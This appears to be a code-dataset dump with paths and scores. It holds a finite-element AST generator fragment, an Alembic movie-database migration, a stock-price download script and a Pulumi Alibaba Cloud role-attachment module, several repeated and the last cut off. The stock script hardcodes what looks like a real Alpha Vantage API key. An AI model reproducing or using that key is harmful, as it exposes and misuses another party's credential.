elif isinstance(element, LocalTensorQuadratureTestBasis):
iterator = TensorIterator(element)
elif isinstance(element, TensorQuadratureTestBasis):
iterator = TensorIterator(element)
elif isinstance(element, TensorTestBasis):
iterator = TensorIterator(element)
elif isinstance(element, LocalTensorQuadratureBasis):
iterator = TensorIterator(element)
elif isinstance(element, TensorQuadratureBasis):
iterator = TensorIterator(element)
elif isinstance(element, TensorBasis):
iterator = TensorIterator(element)
elif isinstance(element, Span):
iterator = TensorIterator(element)
elif isinstance(element, CoefficientBasis):
iterator = ProductIterator(element)
elif isinstance(element, GeometryAtom):
iterator = ProductIterator(element)
else:
raise TypeError('{} not available'.format(type(element)))
# ...
return iterator, generator
#==============================================================================
class Block(Basic):
"""
"""
def __new__(cls, body):
if not isinstance(body, (list, tuple, Tuple)):
body = [body]
body = Tuple(*body)
return Basic.__new__(cls, body)
@property
def body(self):
return self._args[0]
#==============================================================================
def is_scalar_field(expr):
if isinstance(expr, _partial_derivatives):
return is_scalar_field(expr.args[0])
elif isinstance(expr, _logical_partial_derivatives):
return is_scalar_field(expr.args[0])
elif isinstance(expr, ScalarField):
return True
return False
#==============================================================================
def is_vector_field(expr):
if isinstance(expr, _partial_derivatives):
return is_vector_field(expr.args[0])
elif isinstance(expr, _logical_partial_derivatives):
return is_vector_field(expr.args[0])
elif isinstance(expr, (VectorField, IndexedVectorField)):
return True
return False
#==============================================================================
from sympy import Matrix, ImmutableDenseMatrix
from sympy import symbols
from pyccel.ast.core import _atomic
from sympde.expr import TerminalExpr
from sympde.expr import LinearForm
from sympde.expr import BilinearForm
from sympde.topology import element_of
from sympde.topology import ScalarField
from sympde.topology import VectorField, IndexedVectorField
from sympde.topology.space import ScalarTestFunction
from sympde.topology.space import VectorTestFunction
from sympde.topology.space import IndexedTestTrial
from sympde.topology.derivatives import _partial_derivatives
from sympde.topology.derivatives import _logical_partial_derivatives
from sympde.topology.derivatives import get_max_partial_derivatives
class AST(object):
"""
"""
def __init__(self, expr):
# ... compute terminal expr
# TODO check that we have one single domain/interface/boundary
terminal_expr = TerminalExpr(expr)
domain = terminal_expr[0].target
terminal_expr = terminal_expr[0].expr
# print('> terminal expr = ', terminal_expr)
# ...
# ... compute max deriv
nderiv = 0
if isinstance(terminal_expr, Matrix):
n_rows, n_cols = terminal_expr.shape
for i_row in range(0, n_rows):
for i_col in range(0, n_cols):
d = get_max_partial_derivatives(terminal_expr[i_row,i_col])
nderiv = max(nderiv, max(d.values()))
else:
d = get_max_partial_derivatives(terminal_expr)
nderiv = max(nderiv, max(d.values()))
# print('> nderiv = ', nderiv)
# ...
# ...
is_bilinear = False
is_linear = False
is_functional = False
tests = []
trials = []
if isinstance(expr, LinearForm):
is_linear = True
tests = expr.test_functions
elif isinstance(expr, BilinearForm):
is_bilinear = True
tests = expr.test_functions
trials = expr.trial_functions
else:
raise NotImplementedError('TODO')
# ...
# ...
atoms_types = (_partial_derivatives,
VectorTestFunction,
ScalarTestFunction,
IndexedTestTrial,
ScalarField,
VectorField, IndexedVectorField)
atoms = _atomic(expr, cls=atoms_types)
# ...
# ...
atomic_expr_field = [atom for atom in atoms if is_scalar_field(atom)]
atomic_expr_vector_field = [atom for atom in atoms if is_vector_field(atom)]
atomic_expr = [atom for atom in atoms if not( atom in atomic_expr_field ) and
not( atom in atomic_expr_vector_field)]
# ...
# ...
d_tests = {}
for v in tests:
d = {}
d['global'] = GlobalTensorQuadratureTestBasis(v)
d['local'] = LocalTensorQuadratureTestBasis(v)
d['array'] = TensorQuadratureTestBasis(v)
d['basis'] = TensorTestBasis(v)
d['span'] = GlobalSpan(v)
d_tests[v] = d
# ...
# ...
d_trials = {}
for v in trials:
d = {}
d['global'] = GlobalTensorQuadratureTrialBasis(v)
d['local'] = LocalTensorQuadratureTrialBasis(v)
d['array'] = TensorQuadratureTrialBasis(v)
d['basis'] = TensorTrialBasis(v)
d['span'] = GlobalSpan(v)
d_trials[v] = d
# ...
# ...
if is_linear:
ast = _create_ast_linear_form(terminal_expr, atomic_expr, tests, d_tests,
nderiv, domain.dim)
elif is_bilinear:
ast = _create_ast_bilinear_form(terminal_expr, atomic_expr,
tests, d_tests,
trials, d_trials,
nderiv, domain.dim)
else:
raise NotImplementedError('TODO')
# ...
self._expr = ast
self._nderiv = nderiv
self._domain = domain
@property
def expr(self):
return self._expr
@property
def nderiv(self):
return self._nderiv
@property
def domain(self):
return self._domain
@property
def dim(self):
return self.domain.dim
#==============================================================================
def _create_ast_linear_form(terminal_expr, atomic_expr, tests, d_tests, nderiv, dim):
"""
"""
pads = symbols('p1, p2, p3')[:dim]
g_quad = GlobalTensorQuadrature()
l_quad = LocalTensorQuadrature()
# ...
stmts = []
for v in tests:
stmts += construct_logical_expressions(v, nderiv)
stmts += [ComputePhysicalBasis(i) for i in atomic_expr]
# ...
# ...
a_basis = tuple([d['array'] for v,d in d_tests.items()])
loop = Loop((l_quad, *a_basis), index_quad, stmts)
# ...
# ... TODO
l_vec = StencilVectorLocalBasis(pads)
# ...
# ...
loop = Reduce('+', ComputeKernelExpr(terminal_expr), ElementOf(l_vec), loop)
# ...
# ... loop over tests
l_basis = tuple([d['local'] for v,d in d_tests.items()])
stmts = [loop]
loop = Loop(l_basis, index_dof_test, stmts)
# ...
# ... TODO
body = (Reset(l_vec), loop)
stmts = Block(body)
# ...
# ...
g_basis = tuple([d['global'] for v,d in d_tests.items()])
g_span = tuple([d['span'] for v,d in d_tests.items()])
loop = Loop((g_quad, *g_basis, *g_span), index_element, stmts)
# ...
# ... TODO
g_vec = StencilVectorGlobalBasis(pads)
# ...
# ... TODO
body = (Reset(g_vec), Reduce('+', l_vec, g_vec, loop))
stmt = Block(body)
# ...
return stmt
#==============================================================================
def _create_ast_bilinear_form(terminal_expr, atomic_expr,
tests, d_tests,
trials, d_trials,
nderiv, dim):
"""
"""
pads = symbols('p1, p2, p3')[:dim]
g_quad = GlobalTensorQuadrature()
l_quad = LocalTensorQuadrature()
# ...
stmts = []
for v in tests:
stmts += construct_logical_expressions(v, nderiv)
stmts += [ComputePhysicalBasis(i) for i in atomic_expr]
# ...
# ...
a_basis_tests = tuple([d['array'] for v,d in d_tests.items()])
a_basis_trials = tuple([d['array'] for v,d in d_trials.items()])
loop = Loop((l_quad, *a_basis_tests, *a_basis_trials), index_quad, stmts)
# ...
# ... TODO
l_mat = StencilMatrixLocalBasis(pads)
# ...
# ...
loop = Reduce('+', ComputeKernelExpr(terminal_expr), ElementOf(l_mat), loop)
# ...
# ... loop over trials
l_basis = tuple([d['local'] for v,d in d_trials.items()])
stmts = [loop]
loop = Loop(l_basis, index_dof_trial, stmts)
# ...
# ... loop over tests
l_basis = tuple([d['local'] for v,d in d_tests.items()])
stmts = [loop]
loop = Loop(l_basis, index_dof_test, stmts)
# ...
# ... TODO
body = (Reset(l_mat), loop)
stmts = Block(body)
# ...
# ...
g_basis_tests = tuple([d['global'] for v,d in d_tests.items()])
g_basis_trials = tuple([d['global'] for v,d in d_trials.items()])
# TODO d_trials or d_tests here?
g_span = tuple([d['span'] for v,d in d_trials.items()])
loop = Loop((g_quad, *g_basis_tests, *g_basis_trials, *g_span),
index_element, stmts)
# ...
# ... TODO
g_mat = StencilMatrixGlobalBasis(pads)
# ...
# ... TODO
body = (Reset(g_mat), Reduce('+', l_mat, g_mat, loop))
stmt = Block(body)
# ...
return stmt | 0.520009 | 0.318181 |
revision = '<KEY>'
down_revision = '<PASSWORD>'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'movies',
sa.Column('name', sa.String(length=145), nullable=False),
sa.Column('summary', sa.String(length=3000), nullable=True),
sa.Column('create_time', sa.DateTime(), nullable=False),
sa.Column('update_time', sa.DateTime(), nullable=False),
sa.Column('in_theaters', sa.Integer(), nullable=True),
sa.Column('movie_id', sa.Integer(), nullable=False, unique=True),
sa.PrimaryKeyConstraint('movie_id')
)
op.create_table(
'trailers',
sa.Column('url',sa.String(length=2083), nullable=False),
sa.Column('file',sa.String(length=96), nullable=False, unique=True),
sa.Column('create_time', sa.DateTime(), nullable=False),
sa.Column('update_time', sa.DateTime(), nullable=False),
sa.Column('movies_movie_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['movies_movie_id'], ['movies.movie_id'], )
)
op.create_table(
'images',
sa.Column('url',sa.String(length=2083), nullable=False),
sa.Column('file',sa.String(length=96), nullable=False, unique=True),
sa.Column('create_time', sa.DateTime(), nullable=False),
sa.Column('update_time', sa.DateTime(), nullable=False),
sa.Column('movies_movie_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['movies_movie_id'], ['movies.movie_id'], )
)
op.create_table(
'ratings',
sa.Column('rating', sa.Integer(), nullable=False),
sa.Column('create_time', sa.DateTime(), nullable=False),
sa.Column('update_time', sa.DateTime(), nullable=False),
sa.Column('movies_movie_id', sa.Integer(), nullable=False),
sa.Column('users_id', sa.Integer(), nullable=False),
sa.Column('id', sa.Integer(), nullable=False, unique=True),
sa.ForeignKeyConstraint(['users_id'], ['users.id'], ),
sa.ForeignKeyConstraint(['movies_movie_id'], ['movies.movie_id'], )
)
def downgrade():
op.drop_table('movies')
op.drop_table('trailers')
op.drop_table('images')
op.drop_table('ratings') | migrations/versions/cf1f84ccfe6d_create_movies_table.py | revision = '<KEY>'
down_revision = '<PASSWORD>'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'movies',
sa.Column('name', sa.String(length=145), nullable=False),
sa.Column('summary', sa.String(length=3000), nullable=True),
sa.Column('create_time', sa.DateTime(), nullable=False),
sa.Column('update_time', sa.DateTime(), nullable=False),
sa.Column('in_theaters', sa.Integer(), nullable=True),
sa.Column('movie_id', sa.Integer(), nullable=False, unique=True),
sa.PrimaryKeyConstraint('movie_id')
)
op.create_table(
'trailers',
sa.Column('url',sa.String(length=2083), nullable=False),
sa.Column('file',sa.String(length=96), nullable=False, unique=True),
sa.Column('create_time', sa.DateTime(), nullable=False),
sa.Column('update_time', sa.DateTime(), nullable=False),
sa.Column('movies_movie_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['movies_movie_id'], ['movies.movie_id'], )
)
op.create_table(
'images',
sa.Column('url',sa.String(length=2083), nullable=False),
sa.Column('file',sa.String(length=96), nullable=False, unique=True),
sa.Column('create_time', sa.DateTime(), nullable=False),
sa.Column('update_time', sa.DateTime(), nullable=False),
sa.Column('movies_movie_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['movies_movie_id'], ['movies.movie_id'], )
)
op.create_table(
'ratings',
sa.Column('rating', sa.Integer(), nullable=False),
sa.Column('create_time', sa.DateTime(), nullable=False),
sa.Column('update_time', sa.DateTime(), nullable=False),
sa.Column('movies_movie_id', sa.Integer(), nullable=False),
sa.Column('users_id', sa.Integer(), nullable=False),
sa.Column('id', sa.Integer(), nullable=False, unique=True),
sa.ForeignKeyConstraint(['users_id'], ['users.id'], ),
sa.ForeignKeyConstraint(['movies_movie_id'], ['movies.movie_id'], )
)
def downgrade():
op.drop_table('movies')
op.drop_table('trailers')
op.drop_table('images')
op.drop_table('ratings') | 0.365457 | 0.153074 |
from alpha_vantage.timeseries import TimeSeries
from datetime import datetime
import csv
import pandas as pd
import requests
import os
import glob
SYMBOL_URL = "http://www.nasdaq.com/screening/companies-by-name.aspx?letter=0&exchange={}&render=download"
STOCK_EXCHANGES = ["nasdaq", "nyse"]
# Get last 7 days worth of data
def downloadHistory_stocks(symbol, interval='1min'):
try:
ts = TimeSeries(key='055UMQXJRDY71RG3', output_format='pandas')
data, meta_data = ts.get_intraday(
symbol=symbol, interval=interval, outputsize='full')
pd.set_option('display.max_rows', 5000)
dataCovert = str(pd.DataFrame(data))
f = open('data/output.txt', "w")
f.write(dataCovert)
f.close()
DataTemp = ["timestamp,open,high,low,close,volume,vwap\n"]
Data1 = []
f1 = open('data/output.txt')
line = f1.readline()
line = f1.readline()
while 1:
line = f1.readline()
if not line:
break
else:
Data1.append(line.split())
f1.close()
cumulative_total = 0
cumulative_volume = 0
for line in Data1:
# 2017-10-30,09:30:00
date = line.pop(0)
date += ' ' + line.pop(0)
typical_price = (float(line[0]) +
float(line[1]) + float(line[2])) / 3
cumulative_total += (typical_price * float(line[3]))
cumulative_volume += float(line[3])
DataTemp.append(
",".join([date] + line + [str(cumulative_total / cumulative_volume)]) + "\n")
write_csv(file_name="data/" + symbol + ".csv", data=DataTemp)
except ValueError:
pass
# get list of symbols automatically
def get_symbols(directory_name):
for se in STOCK_EXCHANGES:
with requests.Session() as s:
download = s.get(SYMBOL_URL.format(se))
decoded_content = download.content.decode('utf-8')
cr = csv.reader(decoded_content.splitlines(), delimiter=',')
data_list = []
for d in list(cr):
# print(d)
data_list.append(';'.join(d[:8]) + '\n')
write_csv(os.path.join(directory_name, se + ".csv"), data_list)
# Get data for all stocks below some price
def get_data():
get_symbols("data/symbols/")
for filename in glob.glob(os.path.join("data/symbols/", '*.csv')):
df = read_csv(file_name=filename, names=[
"Symbol", "Name", "LastSale", "MarketCap", "IPOyear", "Sector", "industry", "Summary Quote"], sep=";")
for chunk in df:
symbols = chunk["Symbol"].values.tolist()
for s in symbols:
print("Downloading data for ", s)
downloadHistory_stocks(s)
return
def read_csv(file_name, names=["timestamp", "open", "high", "low", "close", "volume", "vwap"], sep=',', chunksize=29):
df = pd.read_csv(file_name, names=names, sep=sep,
header=0, chunksize=chunksize)
return df
def write_csv(file_name="result.csv", data=[]):
file = open(file_name, "w")
file.writelines(data)
file.close()
if __name__ == '__main__':
apple_data = downloadHistory_stocks('SLV')
#mbi_data = downloadHistory_stocks('MBI')
#google_data = downloadHistory_stocks('GOOGL') | dataCollection.py | from alpha_vantage.timeseries import TimeSeries
from datetime import datetime
import csv
import pandas as pd
import requests
import os
import glob
SYMBOL_URL = "http://www.nasdaq.com/screening/companies-by-name.aspx?letter=0&exchange={}&render=download"
STOCK_EXCHANGES = ["nasdaq", "nyse"]
# Get last 7 days worth of data
def downloadHistory_stocks(symbol, interval='1min'):
try:
ts = TimeSeries(key='055UMQXJRDY71RG3', output_format='pandas')
data, meta_data = ts.get_intraday(
symbol=symbol, interval=interval, outputsize='full')
pd.set_option('display.max_rows', 5000)
dataCovert = str(pd.DataFrame(data))
f = open('data/output.txt', "w")
f.write(dataCovert)
f.close()
DataTemp = ["timestamp,open,high,low,close,volume,vwap\n"]
Data1 = []
f1 = open('data/output.txt')
line = f1.readline()
line = f1.readline()
while 1:
line = f1.readline()
if not line:
break
else:
Data1.append(line.split())
f1.close()
cumulative_total = 0
cumulative_volume = 0
for line in Data1:
# 2017-10-30,09:30:00
date = line.pop(0)
date += ' ' + line.pop(0)
typical_price = (float(line[0]) +
float(line[1]) + float(line[2])) / 3
cumulative_total += (typical_price * float(line[3]))
cumulative_volume += float(line[3])
DataTemp.append(
",".join([date] + line + [str(cumulative_total / cumulative_volume)]) + "\n")
write_csv(file_name="data/" + symbol + ".csv", data=DataTemp)
except ValueError:
pass
# get list of symbols automatically
def get_symbols(directory_name):
for se in STOCK_EXCHANGES:
with requests.Session() as s:
download = s.get(SYMBOL_URL.format(se))
decoded_content = download.content.decode('utf-8')
cr = csv.reader(decoded_content.splitlines(), delimiter=',')
data_list = []
for d in list(cr):
# print(d)
data_list.append(';'.join(d[:8]) + '\n')
write_csv(os.path.join(directory_name, se + ".csv"), data_list)
# Get data for all stocks below some price
def get_data():
get_symbols("data/symbols/")
for filename in glob.glob(os.path.join("data/symbols/", '*.csv')):
df = read_csv(file_name=filename, names=[
"Symbol", "Name", "LastSale", "MarketCap", "IPOyear", "Sector", "industry", "Summary Quote"], sep=";")
for chunk in df:
symbols = chunk["Symbol"].values.tolist()
for s in symbols:
print("Downloading data for ", s)
downloadHistory_stocks(s)
return
def read_csv(file_name, names=["timestamp", "open", "high", "low", "close", "volume", "vwap"], sep=',', chunksize=29):
df = pd.read_csv(file_name, names=names, sep=sep,
header=0, chunksize=chunksize)
return df
def write_csv(file_name="result.csv", data=[]):
file = open(file_name, "w")
file.writelines(data)
file.close()
if __name__ == '__main__':
apple_data = downloadHistory_stocks('SLV')
#mbi_data = downloadHistory_stocks('MBI')
#google_data = downloadHistory_stocks('GOOGL') | 0.302597 | 0.254435 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['RoleAttachmentArgs', 'RoleAttachment']
@pulumi.input_type
class RoleAttachmentArgs:
def __init__(__self__, *,
instance_ids: pulumi.Input[Sequence[pulumi.Input[str]]],
role_name: pulumi.Input[str]):
"""
The set of arguments for constructing a RoleAttachment resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
:param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
pulumi.set(__self__, "instance_ids", instance_ids)
pulumi.set(__self__, "role_name", role_name)
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The list of ECS instance's IDs.
"""
return pulumi.get(self, "instance_ids")
@instance_ids.setter
def instance_ids(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "instance_ids", value)
@property
@pulumi.getter(name="roleName")
def role_name(self) -> pulumi.Input[str]:
"""
The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
return pulumi.get(self, "role_name")
@role_name.setter
def role_name(self, value: pulumi.Input[str]):
pulumi.set(self, "role_name", value)
@pulumi.input_type
class _RoleAttachmentState:
def __init__(__self__, *,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role_name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering RoleAttachment resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
:param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
if instance_ids is not None:
pulumi.set(__self__, "instance_ids", instance_ids)
if role_name is not None:
pulumi.set(__self__, "role_name", role_name)
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of ECS instance's IDs.
"""
return pulumi.get(self, "instance_ids")
@instance_ids.setter
def instance_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "instance_ids", value)
@property
@pulumi.getter(name="roleName")
def role_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
return pulumi.get(self, "role_name")
@role_name.setter
def role_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role_name", value)
class RoleAttachment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a RAM role attachment resource to bind role for several ECS instances.
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default_zones = alicloud.get_zones(available_disk_category="cloud_efficiency",
available_resource_creation="VSwitch")
default_instance_types = alicloud.ecs.get_instance_types(availability_zone=default_zones.zones[0].id,
cpu_core_count=2,
memory_size=4)
default_images = alicloud.ecs.get_images(name_regex="^ubuntu_18.*64",
most_recent=True,
owners="system")
config = pulumi.Config()
name = config.get("name")
if name is None:
name = "ecsInstanceVPCExample"
default_network = alicloud.vpc.Network("defaultNetwork",
vpc_name=name,
cidr_block="172.16.0.0/16")
default_switch = alicloud.vpc.Switch("defaultSwitch",
vpc_id=default_network.id,
cidr_block="172.16.0.0/24",
zone_id=default_zones.zones[0].id)
default_security_group = alicloud.ecs.SecurityGroup("defaultSecurityGroup", vpc_id=default_network.id)
default_security_group_rule = alicloud.ecs.SecurityGroupRule("defaultSecurityGroupRule",
type="ingress",
ip_protocol="tcp",
nic_type="intranet",
policy="accept",
port_range="22/22",
priority=1,
security_group_id=default_security_group.id,
cidr_ip="172.16.0.0/24")
foo = alicloud.ecs.Instance("foo",
vswitch_id=default_switch.id,
image_id=default_images.images[0].id,
instance_type=default_instance_types.instance_types[0].id,
system_disk_category="cloud_efficiency",
internet_charge_type="PayByTraffic",
internet_max_bandwidth_out=5,
security_groups=[default_security_group.id],
instance_name=name)
role = alicloud.ram.Role("role",
document=\"\"\" {
"Statement": [
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Principal": {
"Service": [
"ecs.aliyuncs.com"
]
}
}
],
"Version": "1"
}
\"\"\",
description="this is a test",
force=True)
attach = alicloud.ram.RoleAttachment("attach",
role_name=role.name,
instance_ids=[__item.id for __item in [foo]])
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
:param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RoleAttachmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a RAM role attachment resource to bind role for several ECS instances.
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default_zones = alicloud.get_zones(available_disk_category="cloud_efficiency",
available_resource_creation="VSwitch")
default_instance_types = alicloud.ecs.get_instance_types(availability_zone=default_zones.zones[0].id,
cpu_core_count=2,
memory_size=4)
default_images = alicloud.ecs.get_images(name_regex="^ubuntu_18.*64",
most_recent=True,
owners="system")
config = pulumi.Config()
name = config.get("name")
if name is None:
name = "ecsInstanceVPCExample"
default_network = alicloud.vpc.Network("defaultNetwork",
vpc_name=name,
cidr_block="172.16.0.0/16")
default_switch = alicloud.vpc.Switch("defaultSwitch",
vpc_id=default_network.id,
cidr_block="172.16.0.0/24",
zone_id=default_zones.zones[0].id)
default_security_group = alicloud.ecs.SecurityGroup("defaultSecurityGroup", vpc_id=default_network.id)
default_security_group_rule = alicloud.ecs.SecurityGroupRule("defaultSecurityGroupRule",
type="ingress",
ip_protocol="tcp",
nic_type="intranet",
policy="accept",
port_range="22/22",
priority=1,
security_group_id=default_security_group.id,
cidr_ip="172.16.0.0/24")
foo = alicloud.ecs.Instance("foo",
vswitch_id=default_switch.id,
image_id=default_images.images[0].id,
instance_type=default_instance_types.instance_types[0].id,
system_disk_category="cloud_efficiency",
internet_charge_type="PayByTraffic",
internet_max_bandwidth_out=5,
security_groups=[default_security_group.id],
instance_name=name)
role = alicloud.ram.Role("role",
document=\"\"\" {
"Statement": [
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Principal": {
"Service": [
"ecs.aliyuncs.com"
]
}
}
],
"Version": "1"
}
\"\"\",
description="this is a test",
force=True)
attach = alicloud.ram.RoleAttachment("attach",
role_name=role.name,
instance_ids=[__item.id for __item in [foo]])
```
:param str resource_name: The name of the resource.
:param RoleAttachmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RoleAttachmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RoleAttachmentArgs.__new__(RoleAttachmentArgs)
if instance_ids is None and not opts.urn:
raise TypeError("Missing required property 'instance_ids'")
__props__.__dict__["instance_ids"] = instance_ids
if role_name is None and not opts.urn:
raise TypeError("Missing required property 'role_name'")
__props__.__dict__["role_name"] = role_name
super(RoleAttachment, __self__).__init__(
'alicloud:ram/roleAttachment:RoleAttachment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role_name: Optional[pulumi.Input[str]] = None) -> 'RoleAttachment':
"""
Get an existing RoleAttachment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
:param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RoleAttachmentState.__new__(_RoleAttachmentState)
__props__.__dict__["instance_ids"] = instance_ids
__props__.__dict__["role_name"] = role_name
return RoleAttachment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> pulumi.Output[Sequence[str]]:
"""
The list of ECS instance's IDs.
"""
return pulumi.get(self, "instance_ids")
@property
@pulumi.getter(name="roleName")
def role_name(self) -> pulumi.Output[str]:
"""
The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
return pulumi.get(self, "role_name") | sdk/python/pulumi_alicloud/ram/role_attachment.py |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['RoleAttachmentArgs', 'RoleAttachment']
@pulumi.input_type
class RoleAttachmentArgs:
def __init__(__self__, *,
instance_ids: pulumi.Input[Sequence[pulumi.Input[str]]],
role_name: pulumi.Input[str]):
"""
The set of arguments for constructing a RoleAttachment resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
:param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
pulumi.set(__self__, "instance_ids", instance_ids)
pulumi.set(__self__, "role_name", role_name)
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The list of ECS instance's IDs.
"""
return pulumi.get(self, "instance_ids")
@instance_ids.setter
def instance_ids(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "instance_ids", value)
@property
@pulumi.getter(name="roleName")
def role_name(self) -> pulumi.Input[str]:
"""
The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
return pulumi.get(self, "role_name")
@role_name.setter
def role_name(self, value: pulumi.Input[str]):
pulumi.set(self, "role_name", value)
@pulumi.input_type
class _RoleAttachmentState:
def __init__(__self__, *,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role_name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering RoleAttachment resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
:param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
if instance_ids is not None:
pulumi.set(__self__, "instance_ids", instance_ids)
if role_name is not None:
pulumi.set(__self__, "role_name", role_name)
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of ECS instance's IDs.
"""
return pulumi.get(self, "instance_ids")
@instance_ids.setter
def instance_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "instance_ids", value)
@property
@pulumi.getter(name="roleName")
def role_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
return pulumi.get(self, "role_name")
@role_name.setter
def role_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role_name", value)
class RoleAttachment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a RAM role attachment resource to bind role for several ECS instances.
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default_zones = alicloud.get_zones(available_disk_category="cloud_efficiency",
available_resource_creation="VSwitch")
default_instance_types = alicloud.ecs.get_instance_types(availability_zone=default_zones.zones[0].id,
cpu_core_count=2,
memory_size=4)
default_images = alicloud.ecs.get_images(name_regex="^ubuntu_18.*64",
most_recent=True,
owners="system")
config = pulumi.Config()
name = config.get("name")
if name is None:
name = "ecsInstanceVPCExample"
default_network = alicloud.vpc.Network("defaultNetwork",
